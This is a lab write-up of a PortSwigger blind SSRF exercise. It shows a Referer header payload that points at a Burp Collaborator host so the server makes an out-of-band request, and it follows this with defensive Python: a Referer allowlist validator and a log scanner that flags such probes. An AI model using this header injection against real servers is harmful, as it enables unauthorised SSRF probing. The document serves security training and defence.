| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Blind SSRF — Referer Header |
| Difficulty | Practitioner |
| Objective | Trigger an out-of-band HTTP request to Burp Collaborator via the Referer header |
Blind SSRF with Out-of-Band Detection — Writeup
Initial Observation
The lab description tells us the analytics software fetches whatever URL is in the Referer header when a product page loads. That's the SSRF vector: the attacker-controlled URL arrives in a request header rather than in a URL parameter or the request body, and because the response is never shown to us, the SSRF is blind and can only be confirmed out of band.
Attack Path
Intercepting any product page request in Burp and replacing the Referer header with our Collaborator URL:
```http
Referer: https://vtskuarzad70qr80rzy1rwbkebk28swh.oastify.com/?teto=
```
Collaborator receives the request, confirming that the analytics software fetched our URL. Once Collaborator logs that interaction, the lab is solved :P
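To make the defensive side of this concrete, here is an added example (not the lab's code and not PortSwigger's): a hypothetical analytics component shown with the lab's flaw (it uses the Referer value as a fetch target unchanged) next to a hardened validator that only accepts http(s) URLs on an allowlist of the site's own hosts, plus a small combined-log scan that flags any Referer the validator would reject, which is how a defender would spot an out-of-band probe like the Collaborator payload above. The allowlisted hosts (`shop.example`) and the sample log lines are constructed for the example.

```python
"""Referer handling for a hypothetical analytics fetcher: the vulnerable
pattern from the lab beside a hardened validator, plus a log scan that
reports Referer values the validator rejects. Example code, not the lab's."""
import ipaddress
import re
from urllib.parse import urlsplit

# Hosts this hypothetical site expects as referrers (assumption for the example).
ALLOWED_REFERER_HOSTS = {"shop.example", "www.shop.example"}


def vulnerable_referer_target(headers):
    """The lab's flaw: whatever the client puts in Referer becomes the URL the
    analytics code fetches. Returns that URL instead of requesting it, so the
    example runs offline."""
    return headers.get("Referer")


def validate_referer(referer, allowed_hosts=ALLOWED_REFERER_HOSTS):
    """Return (ok, reason). Accept only http(s) URLs whose host is one we
    control, with no userinfo, no explicit port and no IP-literal host."""
    if not referer:
        return False, "missing"
    if len(referer) > 2048:
        return False, "too long"
    try:
        parts = urlsplit(referer)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "unparseable"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo present"
    host = parts.hostname  # already lowercased by urlsplit
    if not host:
        return False, "no host"
    if port is not None:
        return False, "explicit port"
    try:
        ipaddress.ip_address(host)
        return False, "IP literal host"
    except ValueError:
        pass  # not an IP literal, continue with the allowlist check
    if host not in allowed_hosts:
        return False, f"host {host!r} not in allowlist"
    return True, "ok"


# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def find_suspicious_referers(log_lines, allowed_hosts=ALLOWED_REFERER_HOSTS):
    """Scan combined-format log lines and return (client_ip, referer, reason)
    for every Referer the validator would reject. An out-of-band SSRF probe
    via Referer shows up here as a host outside the allowlist."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ref = m.group("referer")
        if ref == "-":
            continue  # no Referer header was sent
        ok, reason = validate_referer(ref, allowed_hosts)
        if not ok:
            findings.append((m.group("ip"), ref, reason))
    return findings


# Constructed sample log lines for the example (not taken from the lab).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /product?productId=1 HTTP/1.1" '
    '200 5123 "https://www.shop.example/" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /product?productId=2 HTTP/1.1" '
    '200 5088 "https://vtskuarzad70qr80rzy1rwbkebk28swh.oastify.com/?teto=" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /product?productId=2 HTTP/1.1" '
    '200 5088 "http://192.0.2.10/" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:55:42 +0000] "GET /product?productId=3 HTTP/1.1" '
    '200 5011 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ref, reason in find_suspicious_referers(SAMPLE_LOG):
        print(f"{ip} sent Referer {ref!r}: {reason}")
```

The validator deliberately refuses to fetch anything it cannot positively match against the allowlist, rather than trying to block known-bad hosts; for an analytics feature the simpler fix is to record the Referer string and never fetch it at all, but where a fetch is required this is the shape of the check.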